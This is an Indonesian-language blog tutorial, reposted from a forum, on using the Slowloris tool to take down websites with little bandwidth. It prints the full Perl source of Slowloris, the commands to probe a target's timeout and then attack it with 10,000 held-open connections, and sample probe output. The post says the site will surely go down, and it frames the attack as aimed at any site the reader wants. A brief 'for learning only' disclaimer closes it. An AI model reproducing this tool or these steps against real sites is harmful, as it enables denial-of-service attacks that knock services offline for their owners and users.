hallo sahabat blogger, sekarang saya akan share cara ddos
menggunakan slowris DDOS low bandwith
Memang DDoS ini sudah cukup lama dan sudah terkenal untuk
OP, namun banyak yang belum tahu bagai mana cara menggunakan tools ini dengan
benar Dodgy
Kali ini saya akan jelas kan bagaimana Cara menggunakan
Tools Slowloris ini dengan benar untuk mengattack atau DDoS website yang kita
inginkan dengan Low bandwith ( tanpa banyak bandwith) silahkan disimak
Pertama Siapkan alat perang, untuk windows diharus kan
install Perl.
copy paste script Slowloris berikut dan simpan dengan
akhiran pl ( ddos.pl )
---------------------------------------------------------------------------------------------------------
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE';
#Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc.....
....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. .
.coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. .
...cO888Oc..
:oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C:
.oCOo.
...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :.
.:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. ....
..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::.......
...:::cccc:cooo
..... .............
.coocoooCCoco:::ccccccc:::ccc::..........
....:::cc::::coC
. . ...
.... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... ..
.. .. ..:...:cooc::cccccc:..... .........
.....:::::ccoocc
. .
.. ..::cccc:.::ccoocc:. ........... ..
. ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and
poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version,
$timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' =>
\$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' =>
\$timeout,
'version' => \$version,
);
if ($version) {
print
"Version 0.7\n";
exit;
}
unless ($host) {
print
"Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print
"\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print
"Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print
"Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout)
{
$timeout =
100;
print
"Defaulting to a 100 second re-try timeout.\n";
}
unless
($connections) {
$connections =
1000;
print
"Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print
"Multithreading enabled.\n";
$usemultithreading
= 1;
use threads;
use
threads::shared;
}
else {
print "No
multithreading capabilites found!\n";
print
"Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared
= 0;
my $failed : shared
= 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost =
$shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method =
"POST";
}
else {
$method =
"GET";
}
if ($test) {
my @times = (
"2", "30", "90", "240", "500"
);
my $totaltime = 0;
foreach (@times) {
$totaltime =
$totaltime + $_;
}
$totaltime =
$totaltime / 60;
print "This
test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock =
new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working =
1;
}
}
else {
if (
$sock =
new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working =
1;
}
}
if ($working) {
if ($cache) {
$rand =
"?" . int( rand(99999999999999) );
}
else {
$rand =
"";
}
my
$primarypayload =
"GET
/$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
.
"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152;
.NET CLR 3.5.30729; MSOffice 12)\r\n"
.
"Content-Length: 42\r\n";
if ( print
$sock $primarypayload ) {
print
"Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to
$host:$port.\n";
print
"Is something wrong?\nDying.\n";
exit;
}
}
else {
print
"Uhm... I can't connect to $host:$port.\n";
print "Is
something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ;
$i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay:
\n";
sleep(
$times[$i] );
if ( print
$sock "X-a: b\r\n" ) {
print
"\tWorked.\n";
$delay =
$times[$i];
}
else {
if (
$SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print
"\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock
"Connection: Close\r\n\r\n" ) {
print
"Okay that's enough time. Slowloris closed the socket.\n";
print
"Use $delay seconds for -timeout.\n";
exit;
}
else {
print
"Remote server closed socket.\n";
print
"Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay <
166 ) {
print
<<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds)
and it generally
takes between 200-500 threads for most servers and assuming
any latency at
all... you might have
trouble using Slowloris against this target.
You can
tweak the -timeout flag down to less than 10 seconds but it
still may not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with
$connections sockets:\n";
if
($usemultithreading) {
domultithreading($connections);
}
else {
doconnections(
$connections, $usemultithreading );
}
}
sub doconnections {
my ( $num,
$usemultithreading ) = @_;
my ( @first,
@sock, @working );
my
$failedconnections = 0;
$working[$_] = 0
foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print
"\t\tBuilding sockets.\n";
foreach my $z
( 1 .. $num ) {
if (
$working[$z] == 0 ) {
if
($ssl) {
if
(
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if
(
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3;
#SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if (
$working[$z] == 1 ) {
if
($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my
$primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152;
.NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if
($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print
"\t\tSending data.\n";
foreach my $z
( 1 .. $num ) {
if (
$working[$z] == 1 ) {
if (
$sock[$z] ) {
my
$handle = $sock[$z];
if
( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount
packets successfully.\nThis thread now sleeping for $timeout
seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my
$connectionsperthread = 50;
while ( $i <
$num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i +=
$connectionsperthread;
}
my @threadslist =
threads->list();
while ( $#threadslist
> 0 ) {
$failed = 0;
}
}
__END__
--------------------------------------------------------------------------------------------------------------------------
setelah anda install perl dan sudah anda save script
tersebut lalu jalankan slowloris dengan perintah
---------------------------------------------------------------------------------
perl ddos.pl -dns www.target.com -port 80 -test
--------------------------------------------------------------------
kesimpulan perintah diatas adalah anda akan test berapa
timeout bandwith dari web tersebut dan port default 80
nah maka si slowloris akan scan sampai dapat timeoutnya,
scannya lumayan lama sih, kalau udah selesai begini nih hasilnya
-------------------------------------------------------------------------------------------
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Testing www.target.com could take up to 14.35 minutes.
Connection successful, now just wait...
Trying a 1 second delay:
Worked.
Trying a 30 second delay:
Worked.
Trying a 90 second delay:
Worked.
Trying a 240 second delay:
Worked.
Trying a 500 second delay:
Failed after
500 seconds.
Remote server closed socket.
Use 240 seconds for -timeout.
-----------------------------------------------------------------------------------------------------
dari analisis Slowloris timeoutnya 240 dan tcp connection 5,
setelah itu kita melakukan penyerangan dengan perintah
------------------------------------------------------------------------------------------------------
per ddos.pl -dns www.target.com -port 80 -timeout 240 -num
10000 -tcp 5
---------------------------------------------------------------------------------------------------------
dari perintah di atas maka slowloris akan menyerang
target.com dengan attack 10000 per 240 , dan hasilnya pasti web akan mudah down
karena kita menyerang pada timout/kelemahan 240 tadi.
nah gunakan tutorial di atas dengan bijak, saya tidak
bertanggung jawab atas kerusakan apapun karena tutorial di atas hanya
pembelajaran semata Idea
sekian dari saya Febriyanto dan terima kasih
source:http://www.tuban-cyber.web.id/forum/Thread-Cara-Menggunakan-Slowloris-DDoS-Low-Bandwith
Post a Comment
~ Berkomentarlah Dengan Sopan dan bijak
~ Dilarang Beriklan disini !!!
~ jika melanggar, komentar anda saya hapus ~